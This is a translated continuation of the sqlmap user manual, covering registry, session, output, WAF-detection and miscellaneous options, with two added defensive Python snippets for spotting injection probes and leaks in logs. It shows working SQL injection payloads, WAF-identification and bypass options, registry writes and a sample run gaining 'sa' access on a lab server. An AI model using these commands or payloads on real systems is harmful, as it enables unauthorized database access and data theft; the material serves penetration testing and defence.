
sqlmap User Manual [continued]

The "sqlmap User Manual" actually only covered most of the options you are likely to use; some were left out, so this part fills them in. Special note: in some places the text shows "–" instead of "--" (that is not me being unwilling to fix it, it is a problem with the web system; my apologies, please correct it by hand after copying the commands. :) )

PS: honestly, most of the sqlmap questions I see in the zone could be solved by reading that article through once. It is a pity that people nowadays no longer have the patience to read an article from start to finish; when they hit a problem they only think about solving that one problem, not realizing how much time they would save later by reading the whole thing now. Rant over, explanation begins:

Windows registry operations

Available when the database is MySQL, PostgreSQL or Microsoft SQL Server and the web application supports stacked queries. Naturally, the database user the application connects with must also have the privileges required to operate on the registry.

Read a registry value

Option: --reg-read

Write a registry value

Option: --reg-add

Delete a registry value

Option: --reg-del

Registry auxiliary options

Options: --reg-key, --reg-value, --reg-data, --reg-type

These must be used together with one of the three options above. Example:

```shell
$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
```

General options

Load a session from SQLite

Option: -s

sqlmap automatically creates a SQLite file for each target under the output directory; use this option if you want to specify the path of the file to load.

Save an HTTP(S) log

Option: -t

This option takes a text file; sqlmap saves the log of HTTP(S) requests and responses there.

Non-interactive mode

Option: --batch

With this option no user input is required; sqlmap keeps running, using the default answer to each of its prompts.

Force a character encoding

Option: --charset

Instead of the character encoding sqlmap detects automatically (for example from the Content-Type HTTP header), force a specific encoding, e.g.:

```shell
--charset=GBK
```

Crawl the website starting from the URL

Option: --crawl

sqlmap can collect links that may potentially be vulnerable; the value that follows is the crawl depth.

Example:

```text
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
[...]
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
[...]
```

Set the delimiter used in CSV output

Option: --csv-del

When the dump is saved in CSV format (--dump-format=CSV) a delimiter is needed. The default is a comma; you can change it to something else, e.g.:

```shell
--csv-del=";"
```

DBMS authentication credentials

Option: --dbms-cred

Sometimes the privileges of the current database user are insufficient and certain operations fail. If you know the password of a higher-privileged user, you can pass it with this option; some databases have a dedicated mechanism for running as another user, such as the OPENROWSET function in Microsoft SQL Server.

Define the format of dumped data

Option: --dump-format

The output format can be set to CSV, HTML or SQLITE.

Estimated time of arrival

Option: --eta

Calculates the time remaining to retrieve the injected data.

For example, a boolean-based blind injection against Oracle:

```text
$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
[...]
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========>                                          ] 11/64  ETA 00:19
```

and then:

```text
100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod

web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
```

sqlmap first retrieves the length of the output, estimates the completion time, shows the progress as a percentage, and then outputs the characters.

Flush the session file

Option: --flush-session

Use this option if you do not want to reuse the session file previously cached for this target. It clears the old session and tests the target from scratch.

Automatically fetch and test forms

Option: --forms

If you want to test the parameters of a form on a page, you can read a request file with the -r option or pass the body with --data. With the --forms option, however, sqlmap automatically fetches the forms on the page at the URL given with -u and tests them.

Ignore query results stored in the session file

Option: --fresh-queries

Ignores the query results saved in the session file and runs the queries again.

Use the DBMS hex function

Option: --hex

Character encoding problems can sometimes cause data loss during retrieval; the DBMS hex function can be used to prevent this.

Example against PostgreSQL:

```text
$ python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors
[...]
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR:  invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
[...]
```
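The payload above wraps the value in two random three-letter markers (`:vtj:` and `:nxb:`) and hex-encodes it, so the bytes survive every charset conversion between the DBMS, the web application and the client. The same property helps a responder: the marker-delimited hex ends up verbatim in application error logs, so the exact value that was pulled out can be recovered during triage. The decoder below is an added example, not part of the manual or of sqlmap; the log line and the marker format handling are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample log line (not from the manual): a PostgreSQL error echoed into an
# application log after an error-based probe that used --hex.
SAMPLE_LOG = (
    "[xx:xx:15] pg_query(): Query failed: ERROR:  invalid input syntax for type numeric: "
    '":vtj:506f737467726553514c20382e332e39:nxb:" in /var/www/app/libs/pgsql.inc.php on line 35'
)

# Start marker, hex payload, end marker. The three-letter markers are random per run, so we
# match their shape rather than fixed strings.
MARKED_HEX = re.compile(r":([a-z]{3}):([0-9A-Fa-f]+):([a-z]{3}):")


@dataclass
class LeakedValue:
    start_marker: str
    end_marker: str
    hex_payload: str
    decoded: Optional[str]  # None when the hex is odd-length, i.e. the log line was truncated


def recover_hex_leaks(log_line: str) -> List[LeakedValue]:
    """Find every marker-delimited hex blob in a log line and decode it as UTF-8."""
    found = []
    for start, payload, end in MARKED_HEX.findall(log_line):
        try:
            decoded = bytes.fromhex(payload).decode("utf-8", errors="replace")
        except ValueError:
            # Odd-length hex: the value was cut off when the error was logged.
            decoded = None
        found.append(LeakedValue(start, end, payload, decoded))
    return found


if __name__ == "__main__":
    for leak in recover_hex_leaks(SAMPLE_LOG):
        print(f"{leak.start_marker}/{leak.end_marker}: {leak.decoded!r}")
```

Run it over the web or application error log for the time window of the incident to list exactly which values the error-based channel disclosed.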

Custom output directory

Option: --output-dir

By default sqlmap saves session and result files under the output folder; this option sets a custom output path, for example --output-dir=/tmp

Parse DBMS error messages from responses

Option: --parse-errors

Sometimes the target has not disabled DBMS error reporting, so a failing statement returns an error message; with this option sqlmap parses and displays those error messages.

```text
$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
[...]
[11:12:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[11:12:17] [INFO] target URL appears to have 3 columns in query
[...]
```

Miscellaneous options

Use option shorthand

Option: -z

When the option list gets too long and complicated, the shorthand form can be used. For example:

```shell
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
```

can be written as:

```shell
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
```

And:

```shell
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"
```

can be written as:

```shell
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
```

Alert on successful SQL injection

Option: --alert

Set answers to prompts

Option: --answers

Use this option when you want sqlmap to supply your chosen answer automatically whenever it prompts for input. Example:

```text
$ python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --technique=E --answers="extending=N" --batch
[...]
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
[...]
```

Beep when SQL injection is found

Option: --beep

Emits a beep whenever an SQL injection is found.

Heuristic detection of WAF/IPS/IDS protection

Option: --check-waf

WAF/IPS/IDS protection can interfere heavily with sqlmap; if you suspect the target is protected in this way, use this option to test for it. sqlmap sends an injection test in a parameter that does not exist on the target,

for example:

```text
&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1
```

If protection is in place, the response returned will probably differ from the normal one.
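The probe has a recognisable shape from the defender's side: SQL keywords arriving in a parameter the application never defined. The detection below is an added example, not part of the manual or of sqlmap; the access-log lines and the per-endpoint list of known parameters are constructed for illustration.

```python
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not from the manual). The second one carries a
# --check-waf style probe: an unknown parameter "foobar" holding a UNION payload.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2023:13:55:37 +0000] "GET /vuln.php?id=1&foobar=AND%201%3D1%20UNION'
    '%20ALL%20SELECT%201%2C2%2C3%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1'
    ' HTTP/1.1" 200 512',
]

# Parameters each endpoint really accepts (assumption for the example; in practice this
# comes from the application's routing or an API schema).
KNOWN_PARAMS: Dict[str, Set[str]] = {"/vuln.php": {"id"}}

REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
# The shape of the page's probe: UNION ALL SELECT ... information_schema, case-insensitive.
SQL_PROBE = re.compile(r"\bUNION\s+ALL\s+SELECT\b.*\binformation_schema\b", re.I)


def find_waf_probes(lines: List[str],
                    known_params: Dict[str, Set[str]] = KNOWN_PARAMS) -> List[Tuple[str, str, str]]:
    """Return (path, parameter, decoded value) for SQL arriving in undefined parameters."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name in known_params.get(parts.path, set()):
                continue  # a real parameter: leave it to the regular SQLi rules
            if SQL_PROBE.search(value):
                hits.append((parts.path, name, value))
    return hits


if __name__ == "__main__":
    for path, name, value in find_waf_probes(SAMPLE_ACCESS_LOG):
        print(f"probe on {path}: {name}={value}")
```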

Clean up sqlmap's UDF(s) and tables

Option: --cleanup

Removes the user-defined functions and tables sqlmap created during the injection.

Disable colored output

Option: --disable-coloring

sqlmap colors its output by default; use this option to turn coloring off.

Use a specific page of Google results

Option: --gpage

By default sqlmap uses the first 100 URLs of the results as injection test targets; with this option you can specify which result page's URLs to test.

Use HTTP parameter pollution

Option: --hpp

HTTP parameter pollution can bypass WAF/IPS/IDS protection mechanisms; it is especially effective on the ASP/IIS and ASP.NET/IIS platforms.

Identify WAF/IPS/IDS protection

Option: --identify-waf

sqlmap can try to identify the WAF/IPS/IDS protecting the target, which makes it easier to choose a bypass; about 30 products are currently recognized.

For example, a MySQL target protected by the ModSecurity WAF:

```text
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
[...]
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
[...]
```

Imitate a smartphone

Option: --mobile

Some servers only accept requests from mobile clients; in that case you can set a phone's User-Agent to imitate a mobile device.

For example:

```text
$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
```

Safely remove files from the output directory

Option: --purge-output

Sometimes result files have to be deleted in a way that prevents their recovery; with this option the original files are overwritten with random data before removal.

For example:

```text
$ python sqlmap.py --purge-output -v 3
[...]
[xx:xx:55] [INFO] purging content of directory '/home/user/sqlmap/output'...
[xx:xx:55] [DEBUG] changing file attributes
[xx:xx:55] [DEBUG] writing random data to files
[xx:xx:55] [DEBUG] truncating files
[xx:xx:55] [DEBUG] renaming filenames to random values
[xx:xx:55] [DEBUG] renaming directory names to random values
[xx:xx:55] [DEBUG] deleting the whole directory tree
[...]
```

Heuristic injection detection

Option: --smart

When testing a very large number of target URLs, this option saves time by only injecting into parameters that the heuristic (error) checks quickly flag as likely injectable.

Example:

```text
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]
```

Wizard for beginners

Option: --wizard

An option aimed at beginners: it walks you step by step through entering the information needed to inject the target.

```text
$ python sqlmap.py --wizard

    sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:25:26

Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1

sqlmap is running, please wait..

heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2986=2986

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+CHAR(115)+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58))
---
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS operating system: Windows XP Service Pack 2
back-end DBMS: Microsoft SQL Server 2005
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
    Oct 14 2005 00:33:37
    Copyright (c) 1988-2005 Microsoft Corporation
    Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
---
current user:    'sa'
current database:    'testdb'
current user is DBA:    True

[*] shutting down at 11:25:52
```

link:http://drops.wooyun.org/tips/401

This article was collected and edited by the Information Security Group of the Network Security Attack and Defense Lab (www.91ri.org); please credit the source when reposting.